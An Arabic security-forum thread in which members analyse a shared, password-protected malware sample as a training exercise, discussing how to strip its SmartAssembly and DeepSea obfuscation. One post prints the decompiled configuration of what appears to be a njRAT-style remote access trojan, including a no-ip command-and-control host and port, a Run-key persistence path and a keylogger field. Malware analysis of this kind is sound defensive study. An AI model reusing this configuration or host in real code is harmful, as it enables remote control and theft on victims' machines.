عـيـنة عينات يستحق النظر لها (4)

[black007]

بسم الله

السلام عليكم ورحمه الله وبركاته

فى سبيل زياده الوعى الامنى وتحفيز قدرات التحليل لدى الاعضاء

تقرر نشر عينات يستحق النظر اليها من قبلى للتحليل و ليس الفحص

لزياده المناقشه بين الاعضاء ووضع البرامج تحت الاختبارات القاسيه

العينات التى ستطرح ليست من برمجتى لذلك يرجى توخى كافه الاحتياطات اللزمه عند التحليل

المطلوب هو المشاركه بفاعليه فى هذه النوع من التحليلات ( لا يشترط التجربه على اليدوى او الحقيقى )

الغرض هنا زياده قدرات التحليل والاعتماد على النفس فى تحليل العينات المطروحه

هل هى خبيثه ام حميه

ايضا كل من سيشارك يقوم بشرح تحليله الخاص للملف من خلال برنامجه

ويعطى رائيه بخصوص سلوكيات الملف

لتحميل العينه

[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

باس فك الضغط

infected

بالتوفيق للجميع

 

[marwan508]

بارك الله فيك اخي مصطفى
بالفعل عينات يستحق النظر فيها مرارا وتكرارا
تسلم يداك على العينات
متابع بدون جربه لزيادة الوعي الامني

كل الود

 

[Lwaa]

بمجرد ان قمت بادخال باس فك الضغط ..=

 

[Shrieef Al Tite]

[hide]

[/hide]

 

[monaration]

كتحليل بسيط
بعد فك الحماية "سمارت " تظهر أكواد مشفرة

+

لي عودة....

 

[black007]

بمجرد ان قمت بادخال باس فك الضغط ..=

[hide]مشاهدة المرفق 98364 [/hide]

الاخوه الكرام لقد ذكرت فى بدايه الموضوع العينه للتحليل و ليست للفحص

 

[black007]

كتحليل بسيط
بعد فك الحماية "سمارت " تظهر أكواد مشفرة

+

لي عودة....

احسنت اخى بانتظار التحليل الكامل منك واستخراج البيانات

ولتسهيل الامر عليك

الملف محمى بحمايتين smartassembly و deepsea

بالتوفيق

 

[m0d!s@r7@n]

كتحليل بسيط
بعد فك الحماية "سمارت " تظهر أكواد مشفرة

+

لي عودة....

واصل اخي

افضل ان تضبط اللغه بالمنقح الي السي شارب وليس اللغه الوسيطه

 

[MagicianMiDo32]

,ربما نتعامل مع داونلودر لسيرفر نجرات الآن \\ بدون تحليل

 

[black007]

,ربما نتعامل مع داونلودر لسيرفر نجرات الآن \\ بدون تحليل

ليس كذالك

الملف لا يحتوى على اى دونلودر

فك الحمايه بالكامل وتاكد من انك فكتها كلها بشكل كامل ستصل الى البيانات بسهوله

 

[MagicianMiDo32]

ليس كذالك

الملف لا يحتوى على اى دونلودر

فك الحمايه بالكامل وتاكد من انك فكتها كلها بشكل كامل ستصل الى البيانات بسهوله

بالفعل

مجرد تخمين
الواحد نفسه في داونلودر من زمان
راحت فين أيام Try It

الراجل حاطط الهكس كله و مشفره في الSub
الريفليكتور بقى بطيئ بطئ التنين

 

[black007]

بالفعل

مجرد تخمين
الواحد نفسه في داونلودر من زمان
راحت فين أيام Try It

الراجل حاطط الهكس كله و مشفره في الSub
الريفليكتور بقى بطيئ بطئ التنين

ههههههههههههههههههههه

نفس الى حصل معايا وانا كنت بفكها

البرنامج قعد شويه مهنج معايا لحد لمه ظهر الاسترنج بالكامل

عندى افكار لل Try It بس هبتقه صعبه محدش هيعرف يوصل للبيانات بسهوله

 

[MagicianMiDo32]

ههههههههههههههههههههه

نفس الى حصل معايا وانا كنت بفكها

البرنامج قعد شويه مهنج معايا لحد لمه ظهر الاسترنج بالكامل

عندى افكار لل Try It بس هبتقه صعبه محدش هيعرف يوصل للبيانات بسهوله

أهم حاجة ميبقاش عليها حماية بتعقد زي Crypto obfuscator دا

 

[black007]

أهم حاجة ميبقاش عليها حماية بتعقد زي Crypto obfuscator دا

لا من غير حمايه خالص

بس هتبقه صعبه

 

[MagicianMiDo32]

[hide]

Shared Sub New()
    Class0.string_0 = "TmlDZQ=="
    Class0.string_1 = "0.6.4"
    Class0.mutex_0 = Nothing
    Class0.string_2 = "rundll32.exe"
    Class0.string_3 = "TEMP"
    Class0.string_4 = "d9347bb67c3915d4b4f4b318a915057b"
    Class0.string_5 = "3crb.no-ip.biz"
    Class0.string_6 = "1123"
    Class0.string_7 = "|'|'|"
    Class0.bool_0 = Class2.smethod_1("False", 14, &H2F)
    Class0.bool_1 = Class2.smethod_1("True", 12, &H2D)
    Class0.bool_2 = Class2.smethod_1("True", &H2D2, &H2F3)
    Class0.bool_3 = Class2.smethod_1("True", &H19E, &H1BF)
    Class0.fileInfo_0 = New FileInfo(Class2.smethod_0(&H144, &H10A))
    Class0.computer_0 = New Computer
    Class0.string_8 = "[endof]"
    Class0.kl_0 = Nothing
    Class0.bool_4 = False
    Class0.string_9 = "Software\Microsoft\Windows\CurrentVersion\Run"
    Class0.tcpClient_0 = Nothing
    Class0.memoryStream_0 = New MemoryStream
    Class0.byte_0 = New Byte(&H1401  - 1) {}
    Class0.string_10 = ""
End Sub

[/hide]

[hide]

[/hide]

 

[black007]

[hide]

Shared Sub New()
    Class0.string_0 = "TmlDZQ=="
    Class0.string_1 = "0.6.4"
    Class0.mutex_0 = Nothing
    Class0.string_2 = "rundll32.exe"
    Class0.string_3 = "TEMP"
    Class0.string_4 = "d9347bb67c3915d4b4f4b318a915057b"
    Class0.string_5 = "3crb.no-ip.biz"
    Class0.string_6 = "1123"
    Class0.string_7 = "|'|'|"
    Class0.bool_0 = Class2.smethod_1("False", 14, &H2F)
    Class0.bool_1 = Class2.smethod_1("True", 12, &H2D)
    Class0.bool_2 = Class2.smethod_1("True", &H2D2, &H2F3)
    Class0.bool_3 = Class2.smethod_1("True", &H19E, &H1BF)
    Class0.fileInfo_0 = New FileInfo(Class2.smethod_0(&H144, &H10A))
    Class0.computer_0 = New Computer
    Class0.string_8 = "[endof]"
    Class0.kl_0 = Nothing
    Class0.bool_4 = False
    Class0.string_9 = "Software\Microsoft\Windows\CurrentVersion\Run"
    Class0.tcpClient_0 = Nothing
    Class0.memoryStream_0 = New MemoryStream
    Class0.byte_0 = New Byte(&H1401  - 1) {}
    Class0.string_10 = ""
End Sub

[/hide]

[hide]
مشاهدة المرفق 98373[/hide]

ممتااااااااااااااز جدا ياميدو

استعد للملف القادم

بس ايه رائيك فى الملف ده ؟؟؟؟؟

شفت لمه الملف متشفر بيحصل ايه

 

[MagicianMiDo32]

ممتااااااااااااااز جدا ياميدو

استعد للملف القادم

بس ايه رائيك فى الملف ده ؟؟؟؟؟

شفت لمه الملف متشفر بيحصل ايه

لو فكيت الحماية خلصت
هي دالة واحدة لفك التشفير والباقي لل Entry point

بس حلو

بيفتح نفس الواحد

 

[ALI 145]

وعليكم السلام ورحمة الله وبركاته

جزاك الله كل خير أخي مصطفى على العينات

وبارك الله فيك وحماك​

 

[mohamed gouch]

وجدت موقع وجربت عليه العينه

[hide]

[/hide]

[hide]

[/hide]

[hide]

[/hide]

[hide]

[/hide]

هل المعلومات صحيحة يا أخي مصطفى لأني لم أتعلم بعد للفك لذلك إستعنت بهذا الموقع

 

[black007]

وجدت موقع وجربت عليه العينه

[hide]

[/hide]

[hide]

[/hide]

[hide]

[/hide]

[hide]

[/hide]

هل المعلومات صحيحة يا أخي مصطفى لأني لم أتعلم بعد للفك لذلك إستعنت بهذا الموقع

نعم البيانات صحيحه

لا باس من متابعه التعلم